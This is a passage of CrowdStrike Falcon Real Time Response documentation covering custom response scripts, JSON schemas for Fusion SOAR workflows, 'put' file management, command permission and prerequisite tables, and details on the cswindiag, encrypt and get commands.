You can also view Falcon scripts on the Scripts tab of the details panel in an RTR session. You can search and sort the Falcon scripts list and open a script to see the script content, provide arguments, and insert the script in the command line.

Managing custom response scripts

You can reach your existing collection of custom scripts either from the Response scripts and files page or from within a Real Time Response session.

Go to Host setup and management > Response and containment > Response scripts and files to see the full list of custom scripts.
Expand the session info panel in a Real Time Response session to view the custom scripts available to run.

Testing a custom script before saving it

Test scripts before you save them: You can run any command from the Edit & Run Scripts tab of a response session without saving.

When you are ready to add a script to your list of custom scripts, click Save As.

Creating a new custom script

You can create custom scripts from the Response scripts and files page or from within a Real Time Response session.

From the Response scripts and files page, go to the Custom scripts tab and click Create script.
From a Real Time Response session, go to the Edit & Run Scripts tab and click Save As.

The Create script dialog appears so that you can finish defining the script. Any content you have entered in the script field shows up in the Create script dialog's Type or Paste Script field.

Supported languages:

Windows: PowerShell
macOS: zsh
Linux: bash

Size guidelines and limitations: The CrowdStrike cloud can generally handle scripts up to 40KB. The actual limits you encounter might be higher or lower. Script sizes are constrained by the underlying messaging architecture that Real Time Response uses. Because scripts are saved in encoded format and carry some additional overhead, we can’t pinpoint an exact size guideline.

Note: Workaround: To work around script size limitations, you can run the script directly from the remote host’s file system. Use the put command to load the script onto the remote host, then use runscript with the -HostPath flag to run the script.

Script runtime limitations: We recommend you avoid creating scripts that have a long runtime. Long-running scripts might be terminated by the Falcon sensor, which will not persist script execution processes indefinitely.

Scripts and workflows: You can invoke your scripts as actions in Falcon Fusion SOAR workflows. For more info, see Using custom scripts with Fusion SOAR workflows.

Additional notes about creating and running custom scripts

Authors should treat their scripts as “stateless,” meaning each invocation of the script is independent of any and all prior runs.
If script content is provided as part of the -Raw flag or if command line arguments are provided as part of the -CommandLine flag, we recommend you enclose the supplied arguments in triple-backticks (for example, ```\```) to avoid any strange special character interpretation issues.
Edit the -Timeout flag to longer than the default 60 seconds if you need the sensor to wait longer for script execution to complete.
For PowerShell scripts: The scripts run in the local system context of the remote host as a separate PowerShell background job. Because of this, some commands, such as write-host are not displayed in the Real Time Response session. For more info about PowerShell background jobs, see Microsoft’s documentation.

Editing a script

You can reach the Edit script dialog either from the Host setup and management > Response and containment > Response scripts and files page or from within a Real Time Response session.

From Host setup and management > Response and containment > Response scripts and files , click Open menu next to the script you want to edit and click Edit script. You can also click Edit script from inside the script details panel.
From a Real Time Response session, expand the session info panel. Under the Scripts tab, click Edit script from the three dot menu on the custom script you want to edit.

Important: A script might be shared with workflows to use as an action in those workflows. If a script is used in more than one workflow, be careful when editing the script to ensure that all workflows that use the script still behave as expected. The console provides a link to a list of workflows that use the script so you can remove the script for a workflow or disable the workflow. Alternatively, to find the workflows that use the script, go to Next-Gen SIEM > Fusion SOAR > Workflows and use the Actions filter to match the script name.

Create/Edit script dialog

The Create script and Edit script dialogs share the same fields.

Script dialog field descriptions

This table explains the items in the script dialog in the order seen in the dialog.

Option, field, or tab	Description
Script name	A unique identifier for the script
Script description	An overview of the script that explains what it does, when to use it, and why
Shell type	The type of shell needed to run the script
Script access Only me RTR Administrator RTR Administrator and RTR Active Responder	Sets who can run or edit this script. Only the script’s creator can run or edit the script. Note: When you select this option, you can’t share the script with workflows. Users with the RTR Administrator role can run or edit the script. Note: These users are the only users who can add custom-script actions to workflows. Depends on the role: Users with the RTR Administrator role have the access mentioned in the previous bullet. Users with the RTR Active Responder role can run the script but cannot edit it. All scripts saved to the cloud can be viewed by users with the Falcon Administrator role.
Share with workflows	Makes the script available as an action in Falcon Fusion SOAR workflows
Script (tab)	The actual script If you reach this dialog from a Real Time Response session, this field is populated with the contents of the script field when you click Save As in that session’s Edit & Run Scripts tab.
Input schema (tab)	Optional. Only needed if the script is shared with workflows and requires input. Specifies a JSON schema to validate input to the script. Instead of providing the schema directly, you can provide JSON that uses the expected format and convert it: Find the Convert JSON to JSON schema text and click the + icon on that line to show the field where you enter the JSON and the Convert button. Note: Do not use `device_id` as a field name. This name is reserved. See Using custom scripts with Fusion SOAR workflows.
Output schema (tab)	Optional. Only needed if the script is shared with workflows and has output that you want to separate into multiple fields. Specifies a JSON schema to define the script’s output. If a script has output but you don’t specify a schema, all the output goes in the `stdout` field. Note: Do not use `stdout` as a field name. This name is reserved and is used even when your script does not have output. Also, do not use `Standard output` as a title. This title is reserved. Instead of providing the schema directly, you can provide JSON that uses the expected format and convert it: Find the Convert JSON to JSON schema text and click the + icon on that line to show the field where you enter the JSON and the Convert button. See Using custom scripts with Fusion SOAR workflows.
Comments (tab)	Text to appear in the audit log (Host setup and management > Response and containment > Response scripts and files, then click View audit log).
Running this script could lead to unexpected system behavior	Optional. For use when sharing the script with workflows. Indicates the script makes changes to the system, such as deleting files. When this option is selected, adding this script’s associated action to a workflow produces a warning to the workflow author.

Using custom scripts with Fusion SOAR workflows

You can invoke your scripts as actions in Falcon Fusion SOAR workflows.

If your script needs input:

The input must be in the JSON format.
You need a JSON schema for that input to make sure the input format is followed.

This schema can’t use the reserved device_id field name.

Similarly, if your script has output:

The output must be in JSON.
By default, all the output goes into a single field called stdout. If your script has output that you want to separate into multiple fields, you must create a JSON schema for that output so that any consumers of that output know the format.

Note: Do not use stdout as a field name. This name is reserved and is used even when your script separates output into multiple fields.
The script output should match the JSON schema.

The following sections discuss how to handle JSON in your scripts and how to create the schemas.

After you test your script, share it with workflows so that the script shows up in Falcon Fusion SOAR workflows as a possible action. For more info about workflows, see Fusion SOAR.

Accepting and producing JSON in your scripts

To create scripts that accept and produce JSON, you have several options.

Note: These examples assume you have input and output schemas in place. The Falcon console can create these schemas for you. You can see sample schemas in Example: Creating a custom script to use with a workflow.

For Windows / PowerShell

PowerShell has these conversion utilities: ConvertFrom-Json and ConvertTo-Json

Here’s an example to show their usage:
```
$name = $args[0] | ConvertFrom-Json | Select -ExpandProperty 'name';
$date = Get-Date;
$out = @{
    Message = "Hello, $name"
    Date = $date.DateTime
}
$out |ConvertTo-Json;
```
If you saved those lines to a script named test script 1, you can run the script as follows:

runscript -CloudFile="test script 1" -CommandLine=```'{"name": "Tim"}'```
For macOS / zsh and Linux / bash, various tools are available to handle JSON.
- jq is a CLI tool for reading values from JSON.
- Python and other scripting languages often provide native support for JSON. Python is available on macOS by default. Here is an example using it.
```
python -c "import json, sys
from datetime import datetime
input = json.loads(sys.argv[-1])
print(json.dumps({'Message': 'Hello, ' + input['name'], 'Date': datetime.now().isoformat()}))
" $@
```
  If you saved those lines to a script named test script 2, you can run the script as follows:
  
  runscript -CloudFile="test script 2" -CommandLine=```'{"name": "Tim"}'```
  
  For more info about these capabilities, see JSON encoder and decoder.

Generating schemas

For the schemas, the format is standard JSON schema, defined in Specification | JSON Schema. The system generally uses the type to know what type of field to expect and can use the format to match it to a workflow field type.

Instead of producing the schemas yourself though, you can provide sample JSON that matches the expected format and let the Falcon console create the schemas for you. See Script dialog field descriptions and the description for either Input schema or Output schema.

Note: The generated JSON schemas make all fields required. You can edit those schemas so that optional fields are no longer in the required properties. Making input fields not required is typically safe. However, making output fields not required can result in failed workflow actions.

Example: Creating a custom script to use with a workflow

This example shows how to create a script and share it with workflows. The example does not show how to update workflows to use the script. For that info, see Fusion SOAR.

Note: If your script requires no input, you do not need to create an input JSON schema. If the output does not need to be separated into multiple fields, you do not need to create an output JSON schema: The output all goes into the stdout field.

This “Hello, World” example uses a PowerShell script, input schema, and output schema.

Go to Host setup and management > Response and containment > Response scripts and files.
Click Create script.
Provide a name, description, and shell type for the script.
Set permissions to RTR Administrator or RTR Administrator and RTR Active Responder.
Click Share with workflows.

On the Script tab, paste the following script:

$name = $args[0] | ConvertFrom-Json | Select -ExpandProperty 'name';
$date = Get-Date;
$out = @{
    Message = "Hello, $name"
    Date = $date.DateTime
}
$out |ConvertTo-Json;

Create an input JSON schema using JSON.

On the Input schema tab, find the Convert JSON to JSON schema text and click the + icon on the same line. Paste the following sample input JSON into the new field and click Convert.

{"name": "Tim"}

Here’s the resulting generated input JSON schema:
```
{
  "$schema": "https://json-schema.org/draft/2020-12/schema",
  "properties": {
    "name": {
      "type": "string"
    }
  },
  "required": [
    "name"
  ],
  "type": "object",
  "description": "This generated schema may need tweaking. In particular format fields are attempts at matching workflow field types but may not be correct."
}
```
Tip: After you generate the schema, you can edit it to better suit your needs. For example, you might want to clarify in the Workflows UI what name the name field refers to. So to show the label of the field as "Your Name" in the Workflows UI, you would add a "Title": "Your Name" line:
```
...
"name": {
      "type": "string",
      "Title": "Your Name"
    }
...
```
Also for string input, you can show a dropdown list in the Workflows UI by adding a "ui:component": "select" line. The dropdown list shows all the string fields from the data.

To create options when using an action in the Workflows UI, you can add enums to the schema. You can also set a default, as shown in this example.
```
"enumWithDefault": {
      "type": "string",
      "enum": ["foo", "bar", "foobar"],
      "default": "foobar"
    },
```
Lastly for string input, to show a dropdown list in the Workflows UI where the options are based on all the fields in the data that match a certain format, you add a "format": "<value>" line where <value> is one the following format values:

cveID

date-time

email

hostname

ipv4

ipv6

localFilePath

localRegistryName

localRegistryPath

mac

networkPort

sha256

md5

url
Create an output JSON schema using JSON.

On the Output schema tab, find the Convert JSON to JSON schema text and click the + icon on the same line. Paste the following sample output JSON into the new field and click Convert.

{"Message": "Hello, Tim", "Date": "Wed Dec 15 23:14:27 UTC 2021"}

Here’s the resulting generated output JSON schema:
```
{
  "$schema": "https://json-schema.org/draft/2020-12/schema",
  "properties": {
    "Date": {
      "type": "string"
    },
    "Message": {
      "type": "string"
    }
  },
  "required": [
    "Message",
    "Date"
  ],
  "type": "object",
  "description": "This generated schema may need tweaking. In particular format fields are attempts at matching workflow field types but may not be correct."
}
```
Tip: Just like with the input schema, after you generate the output schema, you can refine it. For example, you might want the date to be recognized as a timestamp and not just a string. In this case, you would add a "format":"date-time" line:
```
... 
   "Date": {
      "type": "string",

      "format":"date-time"
    },
...
```
With this addition, the workflow system recognizes the date as a timestamp and makes the field available for use in workflow actions that require a timestamp.

Including the date-time value from the example, the useful format values include:

cveID

date-time

email

hostname

ipv4

ipv6

localFilePath

localRegistryName

localRegistryPath

mac

networkPort

sha256

md5

url
On the Comments tab, provide text that will be helpful when viewed in the audit log.
Leave the Running this script could lead to unexpected system behavior option as is.
Click Create.

Troubleshooting your script

If a script does not work as expected, you can gain some insight by checking the log: Go to Host setup and management > Response and containment > Response scripts and files, then click View audit log.

Deleting a custom script

Delete a response script from the Response Scripts & Files page. Click the delete icon in the Actions column for the script you want to delete.

Note: A script might be shared with workflows to use as an action in those workflows. You can delete a script that is only shared with a workflow, but you can’t delete the script if it is used in a workflow definition. Also, the console provides a link to a list of workflows that use the script so you can remove the script for a workflow or disable the workflow. Alternatively, to find the workflows that use a script, go to Workflows and use the Actions filter to match the script name.

Managing files for the put command

You can reach your existing library of files on the “put” files tab of the Response scripts and files page (Host setup and management > Response and containment > Response scripts and files).

Files uploaded for "put" are stored securely in the CrowdStrike cloud, separated from both your other Falcon data and from all other customer data.

"Put" files cannot exceed 4 GB on macOS or Windows, and 2 GB on Linux.

"Put" file names cannot contain single quote characters or exceed 128 characters in length.

Uploading a new "put" file

Reach the Upload “put” file dialog by clicking Upload file on the “put” files tab of the Response scripts and files page (Host setup and management > Response and containment > Response scripts and files).

File upload time is limited to 5 minutes. If the upload will take longer than 5 minutes, you can use the POST /real-time-response/entities/put-files/v1 API endpoint to upload your file without the timeout restriction.

Upload file dialog field descriptions

Select file: Choose the file you want to upload

Name: Give the file a unique name that helps indicate what it is.

File description: Provide a description that will help you and others remember when and why to put it on a host.

Comment for audit logs: Add any additional notes about the file.

Deleting a “put” file

Files uploaded to the cloud for put purposes do not expire but can be deleted by users with the RTR Administrator role on the Host setup and management > Response and containment > Response scripts and files page. To delete a file, click Open menu and click Delete file.

Real Time Response commands

Tip: Run the help command in a real time response session to see the list of commands available to you.

Real Time Response commands and platforms

Command	Description	Windows	macOS	Linux
cat	Display contents of a file	Y	Y	Y
cd	Change the current working directory	Y	Y	Y
clear	Clear screen	Y	Y	Y
cp	Copy a file or directory	Y	Y	Y
csrutil	Get System Integrity Protection status	N	Y	N
cswindiag	Run CrowdStrike Windows diagnostic tool	Y	N	N
encrypt	Encrypt a file with an encryption key. CrowdStrike provides the decryption script to run on your workstation to decrypt the encrypted file.	Y	Y	Y
env	Get environment variables for all scopes (Machine/User/Process)	Y	Y	Y
eventlog	Inspect event logs. Subcommands: backup export list view Note: `eventlog backup` is recommended over `eventlog export`, because it's faster to execute and has the industry-standard .evtx output file format.	Y	N	N
falconscript (4)	Run a Falcon script.	Y	N	N
filehash	Generate the MD5 and SHA256 hashes of a file	Y	Y	Y
get (2), (4)	Get a file from a remote host	Y	Y	Y
getsid	Enumerate local users and Security Identifiers (SID). Used with reg commands.	Y	Y	N
help	Get help on a specific command or subcommand	Y	Y	Y
history	View history	Y	Y	Y
ifconfig	Show network configuration information	N	Y	Y
ipconfig	Show network configuration information	Y	N	N
kill (4)	Kill a process	Y	Y	Y
ls	Display the contents of the specified path	Y	Y	Y
map	Map an SMB (network) share drive	Y	N	N
memdump (2), (4)	Generates and saves a memory dump file of a running process on a host	Y	N	N
mkdir	Create a new directory Note: Newly-created directories are only accessible to members of the host’s Administrator group	Y	Y	Y
mount	List available drives (Windows) List or mount available drives (macOS, Linux)	Y	Y	Y
mv	Move a file or directory	Y	Y	Y
netstat (3), (4)	Display network statistics and active connections Note: This command shows the most details using PowerShell 5.0 or later	Y	Y	Y
ps (4)	Display process information Note: This command shows the most details using PowerShell 5.0 or later	Y	Y	Y
put (2), (4)	Put a file onto a remote host	Y	Y	Y
put-and-run (4)	Put an executable from the CrowdStrike cloud into a secure directory on the machine and run it.	Y	Y	N
pwd	Prints present working directory	N	Y	Y
reg query	Query a registry subkey or values	Y	N	N
reg set	Set registry keys or values	Y	N	N
reg delete	Delete registry subkeys, keys, or values	Y	N	N
reg load	Load a user registry hive from disk	Y	N	N
reg unload	Unload a previously loaded user registry hive	Y	N	N
restart	Restart target system	Y	Y	Y
rm (4)	Remove a file or directory	Y	Y	Y
rmdir, rmdir -r	Remove an empty directory With `-r`, remove a directory and anything it contains	N	N	Y
run (2), (4)	Run an executable	Y	Y	Y
runscript (1), (4)	Run a custom script	Y	Y	Y
shutdown	Shutdown target system	Y	Y	Y
tar	Compress a file or directory into a tar file	N	N	Y
umount	Unmount a filesystem	N	Y	Y
unmap	Map an SMB (network) share drive	Y	N	N
update	Install patches through Windows Update. Subcommands: history: Check Windows Update history on this host. See Microsoft docs for a full list of Windows Update Agent codes. install: Install a patch by specifying a KB ID. KBs that Microsoft considers “optional” are not available. list: Show all available updates for the host, based on Windows Update info query: Show metadata about a KB	Y	N	N
users	Get details about local users	N	Y	Y
xmemdump (2)	Dump the complete or kernel memory of a system	Y	N	N
zip	Compress a file or directory into a zip file	Y	Y	Y

(1) - The ability to use custom scripts is available if enabled in Response Policies.

(2) - High risk commands that are available if enabled in Response Policies.

(3) - Linux hosts must have netstat installed to run the netstat command.

(4) - Available as a Fusion SOAR workflow action. For more info, see Workflow actions.

Real Time Response commands and default user role permissions

There are 3 permission levels that grant default RTR roles permission to execute RTR commands:

Non-Destructive
- Roles: RTR Read Only Analyst, RTR Active Responder, and RTR Administrator
Potentially Destructive
- Roles: RTR Active Responder and RTR Administrator
High Privilege
- Role: RTR Administrator only

This table describes the commands that default RTR roles can execute.

Note: All of the commands listed in this table can also be assigned to custom roles as individual permissions. For more info, see Individual command permissions for custom roles.

Command	RTR Read Only Analyst	RTR Active Responder	RTR Administrator
cat	Y	Y	Y
cd	Y	Y	Y
clear	Y	Y	Y
cp	N	Y	Y
csrutil	Y	Y	Y
cswindiag	N	N	Y
encrypt	N	Y	Y
env	Y	Y	Y
eventlog	Y	Y	Y
falconscript	N	N	Y
filehash	Y	Y	Y
get (2)	N	Y	Y
getsid	Y	Y	Y
help	Y	Y	Y
history	Y	Y	Y
ifconfig	Y	Y	Y
ipconfig	Y	Y	Y
kill	N	Y	Y
ls	Y	Y	Y
map	N	Y	Y
memdump (2)	N	Y	Y
mkdir	N	Y	Y
mount	Y	Y	Y
mv	N	Y	Y
netstat (3)	Y	Y	Y
ps	Y	Y	Y
put (2)	N	N	Y
put-and-run	N	N	Y
pwd	Y	Y	Y
reg query	Y	Y	Y
reg set	N	Y	Y
reg delete	N	Y	Y
reg load	N	Y	Y
reg unload	N	Y	Y
restart	N	Y	Y
rm	N	Y	Y
rm, rm -r	N	Y	Y
run (2)	N	N	Y
runscript (1)	N	Y	Y
shutdown	N	Y	Y
tar	N	Y	Y
umount	N	Y	Y
unmap	N	Y	Y
update	N	Y	Y
users	Y	Y	Y
xmemdump (2)	N	Y	Y
zip	N	Y	Y

(1) - The ability to use custom scripts is available if enabled in Response Policies.

(2) - High risk commands that are available if enabled in Response Policies.

(3) - Linux hosts must have netstat installed to run the netstat command.

Real Time Response command operating system prerequisites

Table 1. Real Time Response command operating system prerequisites
Command	Windows Prerequisites	macOS Prerequisites	Linux Prerequisites
cat	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /bin/cat	/bin/bash (version 3.0 and later) /bin/cat
cd	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later)	/bin/bash (version 3.0 and later)
cp	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /bin/cp	/bin/bash (version 3.0 and later) /bin/readlink /bin/cp
csrutil	N/A	/bin/zsh (version 5.8 and later) /usr/bin/csrutil	N/A
encrypt	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /usr/bin/openssl /usr/bin/hexdump /usr/bin/xxd	/bin/bash (version 3.0 and later) /usr/bin/stat /bin/sleep /usr/bin/openssl /usr/bin/hexdump
env	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /usr/bin/env	/bin/bash (version 3.0 and later) /bin/env /usr/bin/env
eventlog backup	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
eventlog export	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
eventlog list	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
eventlog view	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
falconscript	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
filehash	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /usr/bin/shasum /sbin/md5	/bin/bash (version 3.0 and later) One of: /bin/sha1sum /usr/bin/sha1sum One of: /bin/sha256sum /usr/bin/sha256sum One of: /bin/md5sum /usr/bin/md5sum
get	.NET Framework 4.5 and later PowerShell 3.0 and later C#	N/A	/bin/bash (version 3.0 and later) /bin/readlink
getsid	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /usr/bin/dscl /usr/bin/dsmemberutil	N/A
ifconfig	N/A	/bin/zsh (version 5.8 and later) /sbin/ifconfig	/bin/bash (version 3.0 and later) /sbin/ip
ipconfig	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
kill	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /sbin/launchd /bin/ps /bin/kill	/bin/bash (version 3.0 and later) /bin/cat/proc /bin/readlink
ls	.NET Framework 4.5 and later PowerShell 3.0 and later C#	/bin/zsh (version 5.8 and later) /bin/ls	/bin/bash (version 3.0 and later) /bin/ls
map	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later)	N/A
memdump	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
mkdir	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /bin/mkdir	/bin/bash (version 3.0 and later) /bin/readlink /bin/mkdir
mount	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /sbin/mount	/bin/bash (version 3.0 and later) /bin/mount
mv	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /bin/mv	/bin/bash (version 3.0 and later) /bin/readlink /bin/mv
netstat	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /usr/sbin/netstat	/bin/bash (version 3.0 and later) /bin/netstat
ps	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /bin/ps	/bin/bash (version 3.0 and later) /bin/ps
pwd	N/A	/bin/zsh (version 5.8 and later) /bin/pwd	/bin/bash (version 3.0 and later) /bin/pwd
reg delete	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
reg load	.NET Framework 4.5 and later PowerShell 3.0 and later C#	N/A	N/A
reg query	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
reg set	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
reg unload	.NET Framework 4.5 and later PowerShell 3.0 and later C#	N/A	N/A
restart	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /bin/sleep /sbin/reboot	/bin/bash (version 3.0 and later) /bin/sleep /sbin/shutdown
rm	.NET Framework 4.5 and later PowerShell 3.0 and later C#	/bin/zsh (version 5.8 and later) /bin/rm	/bin/bash (version 3.0 and later) /bin/readlink /bin/rm
rmdir, rmdir -r	N/A	N/A	/bin/bash (version 3.0 and later) /bin/readlink /bin/rmdir
run	N/A	N/A	/bin/bash (version 3.0 and later) /bin/rm /bin/mktemp /usr/bin/mkfifo /bin/cat
runscript	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /bin/sleep	/bin/bash (version 3.0 and later) /bin/cat /bin/sleep
shutdown	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /bin/sleep /sbin/shutdown	/bin/bash (version 3.0 and later) /bin/sleep /sbin/shutdown
tar	N/A	N/A	/bin/bash (version 3.0 and later) /bin/readlink One of: /bin/tar /usr/bin/tar
umount	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
unmap	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
update history	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
update install	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
update list	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
update query	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
users	N/A	/bin/zsh (version 5.8 and later) /usr/bin/dscacheutil /usr/bin/grep	/bin/bash (version 3.0 and later) getent
xmemdump	.NET Framework 4.5 and later PowerShell 3.0 and later	N/A	N/A
zip	.NET Framework 4.5 and later PowerShell 3.0 and later	/bin/zsh (version 5.8 and later) /usr/bin/zip	/bin/bash (version 3.0 and later) /bin/readlink One of: /usr/bin/zip /usr/bin/7z

Additional notes for Windows commands

PowerShell Constrained Language mode is disabled by default. To run RTR commands correctly, PowerShell Constrained Language mode must not be enabled.
It is not possible to list all possible prerequisites for command instances of PowerShell and .NET Framework. See Microsoft’s documentation for info on how to maintain and update PowerShell and .NET.
Commands that require C# must have the compiler version of C# that is bundled with the version of .NET Framework that the commands are using.

Additional info: Real Time Response commands

This section provides some more details and special information about some of the Real Time Response commands. Read more information about any command by running help for the command you want to read about on the Run Commands tab.

cat

If you try to cat a file you don't have access to, you'll see an error message like:

Access to the path 'C:\myfile.txt' is denied.

Instead, run get to download the file from your browser.

cd

You can also change the current directory across volumes:

C:\> cd D:\Data

cp

If you try to cp a file you don't have access to, you'll see an error message like:

Access to the path 'C:\myfile.txt' is denied.

cswindiag

The cswindiag command gathers log files and information about the state of a Windows host and packages them into a zip file that you can send to Support.

What cswindiag gathers

Troubleshooting Windows Sensors - Installation Issues:
- Sensor installation logs from %TEMP% (aka %LOCALAPPDATA%\temp)
- Sensor cloud update logs from %SYSTEMROOT%\temp
- Sensor crash dump files if present in %SYSTEMROOT%\system32\drivers\crowdstrike\support\crashdumps
- Log files from %SYSTEMROOT%\INF\setupapi*.log
- Windows installer configuration, registration data, and listings of installer cached files
- Firewall rules, filter, and Device Control troubleshooting data
- CrowdStrike registry keys
Microsoft system, NIC, and hotfix details
Currently installed programs and registered AV programs
DigiCert High Assurance EV Root CA certificate check
DigiCert Assured ID Root CA certificate check
DNS Cache Type check
.NET Framework version and registry data
BitLocker encryption status
Windows ELAM (Early Launch Anti-Malware) backup directory check
Windows Installer directory check
Core service dependencies status
Basic network details
Connectivity checks/configuration data (Commercial, Gov, and EU Clouds):
- Basic cloud connectivity check
- TLS connection tests
- Certificate chain check
- Supported ciphers check
- User's proxy settings
- Falcon sensor proxy configuration
- SCHANNEL registry configuration
CID and AID details
Falcon sensor and related services start configuration and status CS program and driver files list
CS policy/system registry tags
Currently running processes
Installed Microsoft patches
Running services details
Windows Event logs errors: Application and System
Falcon sensor event logs (if logging is enabled)
MSInfo32 data export

Retrieving a CSWinDiag file

Retrieve the generated CSWinDiag file locally from c:\windows\system32\drivers\crowdstrike\rtr\putrun and securely send it to Support using the CrowdStrike Customer Center. For US-GOV-1 and US-GOV-2 customers, go to the CrowdStrike Government Customer Center.

After executing cswindiag, wait 3–4 minutes for processing to complete.

Note: You are not notified when processing is finished. The average processing time is 3–4 minutes.
In the RTR command window, change to the RTR working directory with one of the following commands.

For Falcon sensor versions before 6.38:

C:\> cd c:\windows\system32\drivers\crowdstrike\rtr\putrun

For Falcon sensor versions 6.38 and later:

C:\> cd c:\"program files"\crowdstrike\rtr\putrun
Run the ls command to list the contents of the working directory.

For Falcon sensor versions before 6.38:

C:\windows\system32\drivers\crowdstrike\rtr\putrun> ls

For Falcon sensor versions 6.38 and later:

C:\"program files"\crowdstrike\rtr\putrun> ls
CSWinDiag filenames use a common format (CSWinDiag_{hostname}_{unique_file_ID}.zip) and include a timestamp of the command execution. Find the CSWinDiag ZIP file with the latest timestamp and run get with the full filename to retrieve it.

For Falcon sensor versions before 6.38:

C:\windows\system32\drivers\crowdstrike\rtr\putrun> get CSWinDiag_<hostname>_mRRfqs8F.zip

For Falcon sensor versions 6.38 and later:

C:\"program files"\crowdstrike\rtr\putrun> get CSWinDiag_<hostname>_mRRfqs8F.zip
When processing is complete, click Download to save the file to your local machine.

Sending a downloaded file to Support

Securely send Support a downloaded CSWinDiag file through the CrowdStrike Customer Center. For US-GOV-1 and US-GOV-2 customers, go to the CrowdStrike Government Customer Center. You can attach your file to a new or existing case.

Note: To ensure your privacy and security, only send files to Support through the CrowdStrike Customer Center. For US-GOV-1 and US-GOV-2 customers, go to the CrowdStrike Government Customer Center. We do not recommend using email to send files to Support, including attaching files when opening cases using email-to-case or when replying to a case by email.

encrypt

The encryption password you supply will be shown in the RTR terminal but will be obfuscated in the audit logs. If you’re specifying your own encryption key for this command, you can perform Base64 encoding and decoding using the following website: http://icyberchef.com/

Decrypting a file encrypted with the encrypt command

Note: decrypt is NOT a Real Time Response command. The information provided here is for offline decryption of files encrypted with the Real Time Response encrypt command.

Decrypt a file encrypted with the encrypt command by running the Falcon Real Time Response Decryption Script (a PowerShell script) available from Support and resources > Resources and tools > Tool downloads.

Download decrypt.zip from Falcon console and extract the files from the zip archive
Open a PowerShell session
Change to the directory where decrypt.ps1 has been extracted
Run decrypt.ps1 by providing it the path to the encrypted file and the encryption key. For example:

C:\PS> .\decrypt.ps1 -SourceFile .\encrypted_file.exe.AES -Key

Note: You are not required to specify the parameter names. You can also provide: C:\PS>.\decrypt.ps1 .\encrypted_file.exe.AES

The decrypted file is created in the same directory as the source file.

Tips:

You might encounter an error that indicates that the execution policy of the system won’t allow you to run the script:

.\decrypt.ps1 : File C:\Users\Analyst\Desktop\decrypt.ps1 cannot be loaded. The file
C:\Users\Analyst\Desktop\decrypt.ps1 is not digitally signed. You cannot run this script on the current system. For
more information about running scripts and setting execution policy, see about_Execution_Policies at
https:/go.microsoft.com/fwlink/?LinkID=135170.
At line:1 char:1
+ .\decrypt.ps1
+ ~~~~~~~~~~~~~
+ CategoryInfo          : SecurityError: (:) [], PSSecurityException
+ FullyQualifiedErrorId : UnauthorizedAccess

If you encounter this error, you can do one of the following:

Configure the execution policy to a less restrictive mode such as RemoteSigned.
Open a PowerShell window with administrative privileges and run the following command: Set-ExecutionPolicy Unrestricted

Reference:

If needed for decryption troubleshooting, the open-source script the encrypt command is based on is available here.

get

When you get a file, you can monitor the upload progress in the file upload banner at the top of the RTR window and from the session detail panel. If you navigate away from the RTR window, you can check the progress of requested files from the session summary panel in the RTR audit log (Audit logs > Audit logs > RTR).
- Upload progress is tracked through a series of file collection and compression stages: upload requested, upload in progress, upload completed, compression started, compression in progress, compress completed.
- During the upload process, you can view the current stage and its percentage of completion.
- When the upload process is complete, you can optionally download the file.
- If an error occurs during upload, a session ID and cloud ID are shown. You can give these numbers to customer support to facilitate error diagnosis and resolution.
Files retrieved with the get command are stored in the CrowdStrike cloud for 7 days. You can choose to delete a file sooner from Audit logs > Audit logs > RTR.
Files can be downloaded multiple times by any users with the appropriate roles until they expire or are deleted.
Files are downloaded as 7-zip archives. Open them with the password infected.
Note: macOS doesn't natively support 7z. Use Keka to decrypt downloaded files.
The maximum file size for get is 4 GB on macOS or Windows, and 2 GB on Linux.
You can't get a directory. Run zip first to package the directory into a zipped file.
Files are stored securely in the CrowdStrike cloud. Files uploaded using get are stored separately from your other Falcon data, as well as separately from other customers' data, for security purposes.
If you end your real time response session while the file is being uploaded to the CrowdStrike cloud, the upload continues. You can retrieve it later from Audit logs > Audit logs > RTR.
You can't cancel a file upload.

Getting a file

Connect to the host.
Run ls and cd to navigate through the host's file system.
Run get to upload the file from the host to the CrowdStrike cloud.
When the file has uploaded, click Download in the Real Time Response session to download the file from the CrowdStrike cloud through your browser.
